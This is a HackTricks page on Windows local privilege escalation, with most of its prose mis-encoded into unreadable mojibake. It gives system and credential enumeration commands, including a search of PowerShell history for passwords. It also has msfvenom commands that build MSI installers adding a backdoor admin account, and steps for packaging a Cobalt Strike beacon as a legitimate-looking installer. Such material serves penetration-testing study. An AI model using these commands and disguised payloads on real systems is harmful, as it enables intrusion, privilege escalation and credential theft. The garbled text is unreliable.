hacktricks/windows-hardening/windows-local-privilege-escalation
2024-07-30 11:11:30 +00:00
..
dll-hijacking Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
privilege-escalation-abusing-tokens Translated ['windows-hardening/windows-local-privilege-escalation/privil 2024-07-30 11:11:30 +00:00
access-tokens.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
acls-dacls-sacls-aces.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
appenddata-addsubdirectory-permission-over-service-registry.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
com-hijacking.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
create-msi-with-wix.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
dll-hijacking.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
dpapi-extracting-passwords.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
from-high-integrity-to-system-with-name-pipes.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
integrity-levels.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
jaws.md Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 16:21:23 +00:00
juicypotato.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
leaked-handle-exploitation.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
msi-wrapper.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
named-pipe-client-impersonation.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
powerup.md Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 16:21:23 +00:00
privilege-escalation-abusing-tokens.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
privilege-escalation-with-autorun-binaries.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
README.md Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:17:20 +00:00
roguepotato-and-printspoofer.md Translated ['windows-hardening/windows-local-privilege-escalation/privil 2024-07-30 11:11:30 +00:00
rottenpotato.md Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 16:21:23 +00:00
seatbelt.md Translated ['windows-hardening/active-directory-methodology/ad-certifica 2024-01-09 16:21:23 +00:00
sedebug-+-seimpersonate-copy-token.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00
seimpersonate-from-high-to-system.md Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:18:57 +00:00
windows-c-payloads.md Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:20:41 +00:00

Windows Local Privilege Escalation

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Windows рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рд╡реЗрдХреНрдЯрд░ рдХреА рдЦреЛрдЬ рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЕрдЪреНрдЫрд╛ рдЙрдкрдХрд░рдг: WinPEAS

рдкреНрд░рд╛рд░рдВрднрд┐рдХ Windows рд╕рд┐рджреНрдзрд╛рдВрдд

рдПрдХреНрд╕реЗрд╕ рдЯреЛрдХрди

рдпрджрд┐ рдЖрдк рдирд╣реАрдВ рдЬрд╛рдирддреЗ рдХрд┐ Windows рдПрдХреНрд╕реЗрд╕ рдЯреЛрдХрди рдХреНрдпрд╛ рд╣реИрдВ, рддреЛ рдЖрдЧреЗ рдмрдврд╝рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдХреЛ рдкрдврд╝реЗрдВ:

{% content-ref url="access-tokens.md" %} access-tokens.md {% endcontent-ref %}

ACLs - DACLs/SACLs/ACEs

ACLs - DACLs/SACLs/ACEs рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ:

{% content-ref url="acls-dacls-sacls-aces.md" %} acls-dacls-sacls-aces.md {% endcontent-ref %}

рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рд▓реЗрд╡рд▓реНрд╕

рдпрджрд┐ рдЖрдк рдирд╣реАрдВ рдЬрд╛рдирддреЗ рдХрд┐ Windows рдореЗрдВ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рд▓реЗрд╡рд▓реНрд╕ рдХреНрдпрд╛ рд╣реИрдВ, рддреЛ рдЖрдЧреЗ рдмрдврд╝рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдХреЛ рдкрдврд╝реЗрдВ:

{% content-ref url="integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}

Windows рд╕реБрд░рдХреНрд╖рд╛ рдирд┐рдпрдВрддреНрд░рдг

Windows рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рдЪреАрдЬреЗрдВ рд╣реИрдВ рдЬреЛ рдЖрдкрдХреЛ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдиреЗ рд╕реЗ рд░реЛрдХ рд╕рдХрддреА рд╣реИрдВ, рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ рдЪрд▓рд╛ рд╕рдХрддреА рд╣реИрдВ рдпрд╛ рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рдЖрдкрдХреА рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд╕рдХрддреА рд╣реИрдВред рдЖрдкрдХреЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рд╕реВрдЪреАрдХрд░рдг рд╢реБрд░реВ рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдХреЛ рдкрдврд╝рдирд╛ рдФрд░ рдЗрди рд╕рднреА рд░рдХреНрд╖рд╛ рдпрдВрддреНрд░реЛрдВ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП:

{% content-ref url="../authentication-credentials-uac-and-efs/" %} authentication-credentials-uac-and-efs {% endcontent-ref %}

рд╕рд┐рд╕реНрдЯрдо рдЬрд╛рдирдХрд╛рд░реА

рд╕рдВрд╕реНрдХрд░рдг рдЬрд╛рдирдХрд╛рд░реА рд╕реВрдЪреАрдХрд░рдг

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ рдХреНрдпрд╛ Windows рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ рдХреЛрдИ рдЬреНрдЮрд╛рдд рднреЗрджреНрдпрддрд╛ рд╣реИ (рд▓рд╛рдЧреВ рдкреИрдЪ рднреА рдЬрд╛рдВрдЪреЗрдВ)ред

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

рдпрд╣ site Microsoft рд╕реБрд░рдХреНрд╖рд╛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА рд╣реИред рдЗрд╕ рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ 4,700 рд╕реЗ рдЕрдзрд┐рдХ рд╕реБрд░рдХреНрд╖рд╛ рдХрдордЬреЛрд░рд┐рдпрд╛рдБ рд╣реИрдВ, рдЬреЛ рд╡рд┐рд╢рд╛рд▓ рд╣рдорд▓реЗ рдХреА рд╕рддрд╣ рдХреЛ рджрд░реНрд╢рд╛рддреА рд╣реИрдВ рдЬреЛ рдПрдХ Windows рд╡рд╛рддрд╛рд╡рд░рдг рдкреНрд░рд╕реНрддреБрдд рдХрд░рддрд╛ рд╣реИред

On the system

  • post/windows/gather/enum_patches
  • post/multi/recon/local_exploit_suggester
  • watson
  • winpeas (Winpeas has watson embedded)

Locally with system information

Github repos of exploits:

Environment

рдХреНрдпрд╛ env variables рдореЗрдВ рдХреЛрдИ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓/рдЬреВрд╕рд┐ рдЬрд╛рдирдХрд╛рд░реА рд╕рд╣реЗрдЬреА рдЧрдИ рд╣реИ?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

PowerShell рдЗрддрд┐рд╣рд╛рд╕

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Transcript files

рдЖрдк рд╕реАрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдЗрд╕реЗ рдХреИрд╕реЗ рдЪрд╛рд▓реВ рдХрд┐рдпрд╛ рдЬрд╛рдП https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

PowerShell рдкрд╛рдЗрдкрд▓рд╛рдЗрди рдирд┐рд╖реНрдкрд╛рджрди рдХрд╛ рд╡рд┐рд╡рд░рдг рд░рд┐рдХреЙрд░реНрдб рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрдорд╛рдВрдб, рдХрдорд╛рдВрдб рдХреЙрд▓ рдФрд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рднрд╛рдЧ рд╢рд╛рдорд┐рд▓ рд╣реЛрддреЗ рд╣реИрдВред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдкреВрд░реНрдг рдирд┐рд╖реНрдкрд╛рджрди рд╡рд┐рд╡рд░рдг рдФрд░ рдЖрдЙрдЯрдкреБрдЯ рдкрд░рд┐рдгрд╛рдо рдХреИрдкреНрдЪрд░ рдирд╣реАрдВ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВред

рдЗрд╕реЗ рд╕рдХреНрд╖рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХреЗ "Transcript files" рдЕрдиреБрднрд╛рдЧ рдореЗрдВ рджрд┐рдП рдЧрдП рдирд┐рд░реНрджреЗрд╢реЛрдВ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ, "Powershell Transcription" рдХреЗ рдмрдЬрд╛рдп "Module Logging" рдХрд╛ рд╡рд┐рдХрд▓реНрдк рдЪреБрдиреЗрдВред

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Powershell рд▓реЙрдЧ рд╕реЗ рдЕрдВрддрд┐рдо 15 рдШрдЯрдирд╛рдПрдБ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрдорд╛рдВрдб рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреА рдкреВрд░реА рдЧрддрд┐рд╡рд┐рдзрд┐ рдФрд░ рдкреВрд░реНрдг рд╕рд╛рдордЧреНрд░реА рд░рд┐рдХреЙрд░реНрдб рдХреА рдЬрд╛рддреА рд╣реИ, рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддреЗ рд╣реБрдП рдХрд┐ рдХреЛрдб рдХрд╛ рд╣рд░ рдмреНрд▓реЙрдХ рдЙрд╕рдХреЗ рдЪрд▓рдиреЗ рдХреЗ рд╕рдордп рджрд╕реНрддрд╛рд╡реЗрдЬреАрдХреГрдд рд╣реИред рдпрд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдкреНрд░рддреНрдпреЗрдХ рдЧрддрд┐рд╡рд┐рдзрд┐ рдХрд╛ рдПрдХ рд╡реНрдпрд╛рдкрдХ рдСрдбрд┐рдЯ рдЯреНрд░реЗрд▓ рдмрдирд╛рдП рд░рдЦрддреА рд╣реИ, рдЬреЛ рдлреЙрд░реЗрдВрд╕рд┐рдХреНрд╕ рдФрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рд╡реНрдпрд╡рд╣рд╛рд░ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдореВрд▓реНрдпрд╡рд╛рди рд╣реИред рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд╕рдордп рд╕рднреА рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЛ рджрд╕реНрддрд╛рд╡реЗрдЬреАрдХреГрдд рдХрд░рдХреЗ, рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рджрд╛рди рдХреА рдЬрд╛рддреА рд╣реИред

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Windows Event Viewer рдореЗрдВ Script Block рдХреЗ рд▓рд┐рдП рд▓реЙрдЧрд┐рдВрдЧ рдЗрд╡реЗрдВрдЯреНрд╕ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкрде рдкрд░ рд╕реНрдерд┐рдд рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВ: Application and Services Logs > Microsoft > Windows > PowerShell > Operationalред
рдЕрдВрддрд┐рдо 20 рдЗрд╡реЗрдВрдЯреНрд╕ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

рдЗрдВрдЯрд░рдиреЗрдЯ рд╕реЗрдЯрд┐рдВрдЧреНрд╕

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

рдбреНрд░рд╛рдЗрд╡реНрд╕

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

рдпрджрд┐ рдЕрдкрдбреЗрдЯ httpS рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдиреБрд░реЛрдз рдирд╣реАрдВ рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ, рдмрд▓реНрдХрд┐ http рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рдЖрдк рд╕рд┐рд╕реНрдЯрдо рдХреЛ рд╕рдордЭреМрддрд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдЖрдк рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЪрд▓рд╛рдХрд░ рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдХреНрдпрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдЧреИрд░-SSL WSUS рдЕрдкрдбреЗрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣рд╛ рд╣реИ:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

рдпрджрд┐ рдЖрдкрдХреЛ рдЗрд╕ рддрд░рд╣ рдХрд╛ рдЙрддреНрддрд░ рдорд┐рд▓рддрд╛ рд╣реИ:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer is equals to 1.

Then, рдпрд╣ exploitable рд╣реИред If the last registry is equals to 0, then, the WSUS entry will be ignored.

In orther to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.

Read the research here:

{% file src="../../.gitbook/assets/CTX_WSUSpect_White_Paper (1).pdf" %}

WSUS CVE-2020-1013

рдпрд╣рд╛рдБ рдкреВрд░рд╛ рд░рд┐рдкреЛрд░реНрдЯ рдкрдврд╝реЗрдВ.
Basically, this is the flaw that this bug exploits:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet ExplorerтАЩs settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current userтАЩs settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current userтАЩs certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).

KrbRelayUp

A рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ vulnerability exists in Windows рдбреЛрдореЗрди environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

рдпрджрд┐ рдпреЗ 2 рд░рдЬрд┐рд╕реНрдЯрд░ рд╕рдХреНрд╖рдо рд╣реИрдВ (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдПрдХ рдореАрдЯрд░рдкреНрд░реЗрдЯрд░ рд╕рддреНрд░ рд╣реИ, рддреЛ рдЖрдк рдЗрд╕ рддрдХрдиреАрдХ рдХреЛ exploit/windows/local/always_install_elevated рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

PowerUP

Write-UserAddMSI рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ power-up рд╕реЗ рд╡рд░реНрддрдорд╛рди рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдХреЗ рдЕрдВрджрд░ рдПрдХ Windows MSI рдмрд╛рдЗрдирд░реА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рддрд╛рдХрд┐ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдП рдЬрд╛ рд╕рдХреЗрдВред рдпрд╣ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдПрдХ рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд MSI рдЗрдВрд╕реНрдЯреЙрд▓рд░ рд▓рд┐рдЦрддреА рд╣реИ рдЬреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛/рд╕рдореВрд╣ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрдХреЗрдд рджреЗрддреА рд╣реИ (рдЗрд╕рд▓рд┐рдП рдЖрдкрдХреЛ GIU рдкрд╣реБрдВрдЪ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреА):

Write-UserAddMSI

рдмрд╕ рдмрдирд╛рдП рдЧрдП рдмрд╛рдЗрдирд░реА рдХреЛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░реЗрдВ рддрд╛рдХрд┐ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝ рд╕рдХреЗред

MSI Wrapper

рдЗрд╕ рдЯреНрдпреВрдЯреЛрд░рд┐рдпрд▓ рдХреЛ рдкрдврд╝реЗрдВ рддрд╛рдХрд┐ рдЖрдк рдЗрд╕ рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ MSI wrapper рдХреИрд╕реЗ рдмрдирд╛рдПрдВред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЖрдк рдПрдХ ".bat" рдлрд╝рд╛рдЗрд▓ рдХреЛ рд▓рдкреЗрдЯ рд╕рдХрддреЗ рд╣реИрдВ рдпрджрд┐ рдЖрдк рдмрд╕ рдХрдорд╛рдВрдб рд▓рд╛рдЗрдиреЛрдВ рдХреЛ рдХрд╛рд░реНрдпрдиреНрд╡рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред

{% content-ref url="msi-wrapper.md" %} msi-wrapper.md {% endcontent-ref %}

WIX рдХреЗ рд╕рд╛рде MSI рдмрдирд╛рдПрдВ

{% content-ref url="create-msi-with-wix.md" %} create-msi-with-wix.md {% endcontent-ref %}

Visual Studio рдХреЗ рд╕рд╛рде MSI рдмрдирд╛рдПрдВ

  • Cobalt Strike рдпрд╛ Metasploit рдХреЗ рд╕рд╛рде рдПрдХ рдирдпрд╛ Windows EXE TCP payload C:\privesc\beacon.exe рдореЗрдВ рдЬрдирд░реЗрдЯ рдХрд░реЗрдВред
  • Visual Studio рдЦреЛрд▓реЗрдВ, Create a new project рдЪреБрдиреЗрдВ рдФрд░ рдЦреЛрдЬ рдмреЙрдХреНрд╕ рдореЗрдВ "installer" рдЯрд╛рдЗрдк рдХрд░реЗрдВред Setup Wizard рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЪреБрдиреЗрдВ рдФрд░ Next рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред
  • рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЛ рдПрдХ рдирд╛рдо рджреЗрдВ, рдЬреИрд╕реЗ AlwaysPrivesc, рд╕реНрдерд╛рди рдХреЗ рд▓рд┐рдП C:\privesc рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ, рд╕рдорд╛рдзрд╛рди рдФрд░ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЛ рдПрдХ рд╣реА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд░рдЦреЗрдВ рдЪреБрдиреЗрдВ, рдФрд░ Create рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред
  • Next рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░рддреЗ рд░рд╣реЗрдВ рдЬрдм рддрдХ рдЖрдк 4 рдореЗрдВ рд╕реЗ 3 рдЪрд░рдг рдкрд░ рдирд╣реАрдВ рдкрд╣реБрдБрдЪрддреЗ (рд╢рд╛рдорд┐рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдлрд╝рд╛рдЗрд▓реЗрдВ рдЪреБрдиреЗрдВ)ред Add рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдФрд░ рдЙрд╕ Beacon payload рдХреЛ рдЪреБрдиреЗрдВ рдЬрд┐рд╕реЗ рдЖрдкрдиреЗ рдЕрднреА рдЬрдирд░реЗрдЯ рдХрд┐рдпрд╛ рд╣реИред рдлрд┐рд░ Finish рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред
  • Solution Explorer рдореЗрдВ AlwaysPrivesc рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЛ рд╣рд╛рдЗрд▓рд╛рдЗрдЯ рдХрд░реЗрдВ рдФрд░ Properties рдореЗрдВ, TargetPlatform рдХреЛ x86 рд╕реЗ x64 рдореЗрдВ рдмрджрд▓реЗрдВред
  • рдЕрдиреНрдп рдЧреБрдг рднреА рд╣реИрдВ рдЬрд┐рдиреНрд╣реЗрдВ рдЖрдк рдмрджрд▓ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреИрд╕реЗ Author рдФрд░ Manufacturer рдЬреЛ рд╕реНрдерд╛рдкрд┐рдд рдРрдк рдХреЛ рдЕрдзрд┐рдХ рд╡реИрдз рджрд┐рдЦрд╛ рд╕рдХрддреЗ рд╣реИрдВред
  • рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдкрд░ рд░рд╛рдЗрдЯ-рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдФрд░ View > Custom Actions рдЪреБрдиреЗрдВред
  • Install рдкрд░ рд░рд╛рдЗрдЯ-рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ рдФрд░ Add Custom Action рдЪреБрдиреЗрдВред
  • Application Folder рдкрд░ рдбрдмрд▓-рдХреНрд▓рд┐рдХ рдХрд░реЗрдВ, рдЕрдкрдиреЗ beacon.exe рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ рдФрд░ OK рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдЧрд╛ рдХрд┐ beacon payload рдЗрдВрд╕реНрдЯреЙрд▓рд░ рдЪрд▓рдиреЗ рдкрд░ рддреБрд░рдВрдд рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рд╣реЛред
  • Custom Action Properties рдХреЗ рддрд╣рдд, Run64Bit рдХреЛ True рдореЗрдВ рдмрджрд▓реЗрдВред
  • рдЕрдВрдд рдореЗрдВ, рдЗрд╕реЗ рдмрдирд╛рдПрдВред
